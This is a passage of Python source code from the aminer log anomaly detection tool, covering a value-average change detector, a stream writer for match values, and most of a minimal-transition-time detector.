matches.append(match) affected_log_atom_values = [] for match in matches: if isinstance(match.match_object, bytes): affected_log_atom_values.append(match.match_object.decode(AminerConfig.ENCODING)) else: affected_log_atom_values.append(match.match_object) if self.target_value_list and not all(x in self.target_value_list for x in affected_log_atom_values): continue try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) analysis_component = {"AffectedLogAtomPaths": [target_path], "AffectedLogAtomValues": [str(affected_log_atom_values)]} sorted_log_lines = [original_log_line_prefix + data] event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", "Log Atom Filtered", sorted_log_lines, event_data, log_atom, self) self.log_success += 1 MatchValueAverageChangeDetector.py000066400000000000000000000321341500476301700374500ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector that reports diverges from an average. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import build_persistence_file_name, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MatchValueAverageChangeDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, PersistableComponentInterface): """This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest diverges significantly from the values observed before. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, timestamp_path, target_path_list, min_bin_elements, min_bin_time, debug_mode=False, persistence_id="Default", output_logline=True, learn_mode=False, avg_factor=1, var_factor=2, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param timestamp_path if not None, use this path value for timestamp based bins. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param learn_mode specifies whether new statistics should be learned. @param min_bin_elements evaluate the latest bin only after at least that number of elements was added to it. @param min_bin_time evaluate the latest bin only when the first element is received after min_bin_time has elapsed. @param avg_factor the maximum allowed deviation for the average value before an anomaly is raised. @param var_factor the maximum allowed deviation for the variance of the value before an anomaly is raised. @param debug_mode if true, generate an analysis report even when average of last bin was within expected range. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, timestamp_path=timestamp_path, target_path_list=target_path_list, min_bin_elements=min_bin_elements, min_bin_time=min_bin_time, debug_mode=debug_mode, persistence_id=persistence_id, output_logline=output_logline, avg_factor=avg_factor, var_factor=var_factor, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"] ) if not self.target_path_list: msg = "target_path_list must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.stat_data = [] self.load_persistence_data() def receive_atom(self, log_atom): """Send summary to all event handlers.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return self.log_total += 1 parser_match = log_atom.parser_match value_dict = parser_match.get_match_dictionary() if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False timestamp_value = log_atom.get_timestamp() if self.timestamp_path is not None: match_value = value_dict.get(self.timestamp_path) if match_value is None: return timestamp_value = match_value.match_object event_data = {"MatchValue": match_value.match_object} analysis_summary = "" ready_for_analysis_flag = True for (path, stat_data) in self.stat_data: match = value_dict.get(path) if match is None: ready_for_analysis_flag = (self.update(stat_data, timestamp_value, None) and ready_for_analysis_flag) else: if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) if isinstance(match, list): data = [] for m in match: data.append(m.match_object) else: data = match.match_object ready_for_analysis_flag = (self.update(stat_data, timestamp_value, data) and ready_for_analysis_flag) if ready_for_analysis_flag: anomaly_scores = [] for (path, stat_data) in self.stat_data: analysis_data = self.analyze(stat_data) if analysis_data is not None: d = {"Path": path} a = {} new = {"N": analysis_data[1], "Avg": analysis_data[2], "Var": analysis_data[3]} old = {"N": analysis_data[4], "Avg": analysis_data[5], "Var": analysis_data[6]} a["New"] = new a["Old"] = old d["AnalysisData"] = a if analysis_summary == "": analysis_summary += f'"{path}": {analysis_data[0]}' else: analysis_summary += os.linesep analysis_summary += f' "{path}": {analysis_data[0]}' anomaly_scores.append(d) analysis_component = {"AffectedLogAtomPaths": list(value_dict), "AnomalyScores": anomaly_scores, "MinBinElements": self.min_bin_elements, "MinBinTime": self.min_bin_time, "DebugMode": self.debug_mode} event_data = {"AnalysisComponent": analysis_component} if analysis_summary: res = [""] * stat_data[2][0] res[0] = analysis_summary for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "Statistical data report", res, event_data, log_atom, self) self.log_success += 1 def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) for path in self.target_path_list: self.stat_data.append((path, [],)) def replace_brackets(val): """Replace lists with tuples.""" if isinstance(val, list): val = tuple(val) return val if persistence_data is not None: for val in persistence_data: values = replace_brackets(val[1]) index = 0 for p, _ in self.stat_data: if p == val[0]: break index += 1 for value in values: value = replace_brackets(value) self.stat_data[index][1].append(value) def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.stat_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def update(self, stat_data, timestamp_value, value): """Update the collected statistics data. @param value if value not None, check only conditions if current bin is full enough. @return true if the bin is full enough to perform an analysis. """ if value is not None: if not stat_data: # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance), # current-bin (n, sum, sum2) stat_data.append(timestamp_value) stat_data.append(value) stat_data.append(None) stat_data.append((1, 0.0, 0.0,)) else: delta = value - stat_data[1] bin_values = stat_data[3] stat_data[3] = (bin_values[0] + 1, bin_values[1] + delta, bin_values[2] + delta * delta) if not stat_data: return False if stat_data[3][0] < self.min_bin_elements: return False if self.timestamp_path is not None: return timestamp_value - stat_data[0] >= self.min_bin_time return True def analyze(self, stat_data): """Perform the analysis and progress from the last bin to the next one. @return None when statistical data was as expected and debugging is disabled. """ logging.getLogger(DEBUG_LOG_NAME).debug("%s performs analysis.", self.__class__.__name__) current_bin = stat_data[3] current_average = current_bin[1] / current_bin[0] current_variance = (current_bin[2] - (current_bin[1] * current_bin[1]) / current_bin[0]) / (current_bin[0] - 1) # Append timestamp, k-value, old-bin (n, sum, sum2, avg, variance), # current-bin (n, sum, sum2) old_bin = stat_data[2] if old_bin is None: stat_data[2] = (current_bin[0], current_bin[1], current_bin[2], current_average, current_variance,) stat_data[3] = (0, 0.0, 0.0) if self.debug_mode: return [f"Initial: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}"] + [None]*10 else: total_n = old_bin[0] + current_bin[0] total_sum = old_bin[1] + current_bin[1] total_sum2 = old_bin[2] + current_bin[2] if self.learn_mode: stat_data[2] = ( total_n, total_sum, total_sum2, total_sum / total_n, (total_sum2 - (total_sum * total_sum) / total_n) / (total_n - 1)) stat_data[3] = (0, 0.0, 0.0) if (current_variance > self.var_factor * old_bin[4]) or (abs(current_average - old_bin[3]) > self.avg_factor * old_bin[4]) or \ self.debug_mode: res = [f"Change: new: n = {current_bin[0]}, avg = {current_average + stat_data[1]}, var = {current_variance}; old: n = " f"{old_bin[0]}, avg = {old_bin[3] + stat_data[1]}, var = { old_bin[4]}", current_bin[0], current_average + stat_data[1], current_variance, old_bin[0], old_bin[3] + stat_data[1], old_bin[4]] return res return None MatchValueStreamWriter.py000066400000000000000000000115031500476301700357230ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a writer that forwards match information to a stream. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface import _io class MatchValueStreamWriter(AtomHandlerInterface, TimeTriggeredComponentInterface): """This class extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, stream, target_path_list, separator, missing_value_string, log_resource_ignore_list=None): """Initialize the writer. @param stream the stream on which the match results are written. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param separator a string to be added between match values in the output stream. @param missing_value_string a string which is added if no match was found. """ # avoid "defined outside init" issue self.log_success, self.log_total = [None]*2 super().__init__(stream=stream, target_path_list=target_path_list, separator=separator, missing_value_string=missing_value_string, log_resource_ignore_list=log_resource_ignore_list, mutable_default_args=["log_resource_ignore_list"]) if self.target_path_list is None: raise TypeError("target_path_list must not be None.") def receive_atom(self, log_atom): """Forward match value information to the stream.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() add_sep_flag = False contains_data = False result = b"" for i, path in enumerate(self.target_path_list): if add_sep_flag: result += self.separator match = match_dict.get(path) if match is None: result += self.missing_value_string else: matches = [] cnt = self.target_path_list.count(path) if isinstance(match, list): if cnt > 1: index = [j for j, x in enumerate(self.target_path_list) if x == path].index(i) if index < [x.path for x in match if x.path == path].count(path) and index < len(match): matches.append(match[index]) else: matches.append(None) else: matches += match elif cnt > 1 and i > self.target_path_list.index(path): matches.append(None) else: matches.append(match) for match in matches: if match is None: result += self.missing_value_string + self.separator else: result += match.match_string + self.separator contains_data = True if len(self.separator) > 0: result = result[:-len(self.separator)] add_sep_flag = True if contains_data: if not isinstance(self.stream, _io.BytesIO): self.stream.write(result.decode("ascii", "ignore")) self.stream.write("\n") else: self.stream.write(result) self.stream.write(b"\n") self.log_success += 1 def do_timer(self, _trigger_time): """Flush the timer.""" self.stream.flush() return 10 def do_persist(self): """Flush the timer.""" self.stream.flush() MinimalTransitionTimeDetector.py000066400000000000000000001004131500476301700372720ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for minimal transition times between states (e.g. value combinations of stated paths). This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import logging from aminer.AminerConfig import DEBUG_LOG_NAME, build_persistence_file_name, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MinimalTransitionTimeDetector( AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when minimal transition times between states (e.g. value combinations of stated paths) are undercut.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, id_path_list=None, ignore_list=None, constraint_list=None, allow_missing_id=False, num_log_lines_solidify_matrix=100, time_output_threshold=0, anomaly_threshold=0.05, persistence_id="Default", learn_mode=False, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param id_path_list the list of paths where id values can be stored in all relevant log event types. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param allow_missing_id specifies whether log atoms without id path should be omitted (only if id path is set). does not refer to an existing parsed data object. @param num_log_lines_solidify_matrix number of processed log lines after which the matrix is solidified. This process is periodically repeated. @param time_output_threshold threshold for the tested minimal transition time which has to be exceeded to be tested. @param anomaly_threshold threshold for the confidence which must be exceeded to raise an anomaly. @param persistence_id name of persistence file. @param learn_mode specifies whether newly observed sequences should be added to the learned model @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "id_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, id_path_list=id_path_list, ignore_list=ignore_list, constraint_list=constraint_list, allow_missing_id=allow_missing_id, num_log_lines_solidify_matrix=num_log_lines_solidify_matrix, time_output_threshold=time_output_threshold, anomaly_threshold=anomaly_threshold, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not self.target_path_list: msg = "target_path_list must not be empty or None." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) # Initialization auxiliary variables self.time_matrix = {} self.last_value = {} self.last_time = {} self.log_total = 0 # Load persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source and analyzes minimal times between transitions.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip paths from ignore list. if any(ignore_path in log_atom.parser_match.get_match_dictionary().keys() for ignore_path in self.ignore_list): return False # Increase the count by one and check if the matrix should be solidified. self.log_total += 1 if self.log_total % self.num_log_lines_solidify_matrix == 0: self.solidify_matrix() # Use target_path_list to differentiate sequences by their id. event_value = () for path in self.target_path_list: match = log_atom.parser_match.get_match_dictionary().get(path) if match is None: if self.allow_missing_id is True: # Insert placeholder for path that is not available event_value += ("",) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(match.match_object, bytes): event_value += (match.match_object.decode(AminerConfig.ENCODING),) else: event_value += (match.match_object,) # Get current index from combination of values of paths of id_path_list id_tuple = () for id_path in self.id_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ("",) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Check if id_tuple has already appeared. if id_tuple not in self.last_value: # Initialize the last value and time self.last_value[id_tuple] = event_value self.last_time[id_tuple] = log_atom.atom_time else: # Check if the event_value changed or if the times are not strictly ascending and skip the line in that cases. if self.last_value[id_tuple] == event_value: self.last_time[id_tuple] = log_atom.atom_time return True if log_atom.atom_time - self.last_time[id_tuple] < 0: additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)], "AffectedIdValues": list(id_tuple), "PreviousTime": self.last_time[id_tuple], "NewTime": log_atom.atom_time} self.print(f"Anomaly in log line order: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)}): " f"{self.last_time[id_tuple]} - {log_atom.atom_time}", log_atom, self.target_path_list, confidence=1, additional_information=additional_information) return True # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_value in self.time_matrix and self.last_value[id_tuple] in self.time_matrix[event_value]: event_value_1 = event_value event_value_2 = self.last_value[id_tuple] elif self.last_value[id_tuple] in self.time_matrix and event_value in self.time_matrix[self.last_value[id_tuple]]: event_value_1 = self.last_value[id_tuple] event_value_2 = event_value if event_value_1 is None: # Initialize the entry in the time matrix if event_value not in self.time_matrix: self.time_matrix[event_value] = {} additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)], "AffectedIdValues": list(id_tuple), "NewMinimalTime": log_atom.atom_time - self.last_time[id_tuple]} message = f"First Appearance: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)})," \ f" {log_atom.atom_time - self.last_time[id_tuple]}" self.print(message, log_atom, self.target_path_list, additional_information=additional_information) if self.learn_mode: self.time_matrix[event_value][self.last_value[id_tuple]] = log_atom.atom_time - self.last_time[id_tuple] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: # Check and update if the time was undercut if self.time_matrix[event_value_1][event_value_2] > log_atom.atom_time - self.last_time[id_tuple] and\ self.time_matrix[event_value_1][event_value_2] > self.time_output_threshold: if 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2] >\ self.anomaly_threshold: additional_information = {"AffectedLogAtomValues": [list(self.last_value[id_tuple]), list(event_value)], "AffectedIdValues": list(id_tuple), "PreviousMinimalTime": self.time_matrix[event_value_1][event_value_2], "NewMinimalTime": log_atom.atom_time - self.last_time[id_tuple]} message = f"Undercut transition time: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)})," \ f" {self.time_matrix[event_value_1][event_value_2]} -> {log_atom.atom_time - self.last_time[id_tuple]}" confidence = 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2] self.print( message, log_atom, self.target_path_list, confidence=confidence, additional_information=additional_information) if self.learn_mode: self.time_matrix[event_value_1][event_value_2] = log_atom.atom_time - self.last_time[id_tuple] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) # Update the last_value and time self.last_value[id_tuple] = event_value self.last_time[id_tuple] = log_atom.atom_time return True def solidify_matrix(self): """Solidify minimal time matrix with the trianlge inequality.""" # Initialize list old_pairs with all transitions and a list of all values # The list of old_pairs includes the minimal times which can be used to reduce the minimal ransition times of other transitions values = list(self.time_matrix.keys()) for key1 in self.time_matrix: values += [key for key in self.time_matrix[key1] if key not in values] old_pairs = [[key1, key2] for key1 in self.time_matrix for key2 in self.time_matrix[key1]] # Check the triangle inequality as long as values are corrected while len(old_pairs) > 0: new_pairs = [] for old_pair in old_pairs: # Check triangle inequality value - old_pair[0] - old_pair[1] > value - old_pair[1] and # old_pair[0] - old_pair[1] - value > value - old_pair[0] for value in values: if value in (old_pair[0], old_pair[1]): continue # Check value - old_pair[0] - old_pair[1] > value - old_pair[1] if (old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]) or ( value in self.time_matrix and old_pair[0] in self.time_matrix[value]): if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]: key_1_1 = old_pair[0] key_1_2 = value else: key_1_1 = value key_1_2 = old_pair[0] if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]: key_2_1 = old_pair[1] key_2_2 = value else: key_2_1 = value key_2_2 = old_pair[1] if key_2_1 not in self.time_matrix: self.time_matrix[key_2_1] = {} if (key_2_2 not in self.time_matrix[key_2_1] or self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] < self.time_matrix[key_2_1][key_2_2]): self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\ self.time_matrix[old_pair[0]][old_pair[1]] if [key_2_1, key_2_2] not in new_pairs: new_pairs += [[key_2_1, key_2_2]] # Check old_pair[0] - old_pair[1] - value > value - old_pair[0] if (old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]) or ( value in self.time_matrix and old_pair[1] in self.time_matrix[value]): if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]: key_1_1 = old_pair[1] key_1_2 = value else: key_1_1 = value key_1_2 = old_pair[1] if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]: key_2_1 = old_pair[0] key_2_2 = value else: key_2_1 = value key_2_2 = old_pair[0] if key_2_1 not in self.time_matrix: self.time_matrix[key_2_1] = {} if (key_2_2 not in self.time_matrix[key_2_1] or self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] < self.time_matrix[key_2_1][key_2_2]): self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\ self.time_matrix[old_pair[0]][old_pair[1]] if [key_2_1, key_2_2] not in new_pairs: new_pairs += [[key_2_1, key_2_2]] old_pairs = new_pairs def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] keys_1 = list(self.time_matrix.keys()) keys_2 = [list(self.time_matrix[key].keys()) for key in keys_1] return_matrix = [[self.time_matrix[keys_1[i]][keys_2[i][j]] for j in range(len(keys_2[i]))] for i in range(len(keys_1))] persist_data.append(return_matrix) persist_data.append(keys_1) persist_data.append(keys_2) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: return_matrix = persistence_data[0] keys_1 = [tuple(key) for key in persistence_data[1]] keys_2 = [[tuple(key) for key in persistence_data[2][i]] for i in range(len(persistence_data[2]))] self.time_matrix = {keys_1[i]: {keys_2[i][j]: return_matrix[i][j] for j in range(len(keys_2[i]))} for i in range(len(keys_1))} def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def print_persistence_event(self, event_type, event_data): """Prints the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 2 and ( (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])) or ( len(event_data) == 1 and isinstance(event_data[0], list) and len(event_data[0]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = "Event_data has the wrong format." \ "The supported formats are [], [path_value_list] and [path_value_list_1, path_value_list_2], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.time_matrix.keys()) for value in list(values_set): for value_2 in self.time_matrix[value]: values_set.add(value_2) values_list = list(values_set) values_list.sort() string = f"Persistence includes transition times to the following path values: {values_list}" elif len(event_data) == 1: # Print the set of all path values which have a transition time to the path value specified in event_data # Check if the path value has an entry in self.time_matrix if event_data[0] in self.time_matrix: values_set = set(self.time_matrix[event_data[0]].keys()) else: values_set = set() # Check if key values in self.time_matrix contain the path value of event_data for value in list(self.time_matrix.keys()): if event_data[0] in self.time_matrix[value]: values_set.add(value) values_list = list(values_set) values_list.sort() # Set output string if len(values_set) > 0: string = f"Persistence includes transition times from {event_data[0]} to the following path values: {values_list}" else: string = f"Persistence includes no transition time from {event_data[0]}." else: # Print the transition time # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Set output string if event_value_1 is None: string = f"No transition time for {list(event_data[0])} - {list(event_data[1])}." else: string = f"Transition time {list(event_data[0])} - {list(event_data[1])}: {self.time_matrix[event_value_1][event_value_2]}." return string def add_to_persistence_event(self, event_type, event_data): """Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (isinstance(event_data, list) and len(event_data) == 3 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1]) and isinstance(event_data[2], (int, float))): msg = "Event_data has the wrong format." \ "The supported format is [path_value_list_1, path_value_list_2, new_transition_time], " \ "where the path value lists are lists of strings with the same length as the defined paths in the config." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] if event_value_1 is None: # Initialize the entry in the time matrix if event_data[0] not in self.time_matrix: self.time_matrix[event_data[0]] = {} self.time_matrix[event_data[0]][event_data[1]] = float(event_data[2]) return f"Added 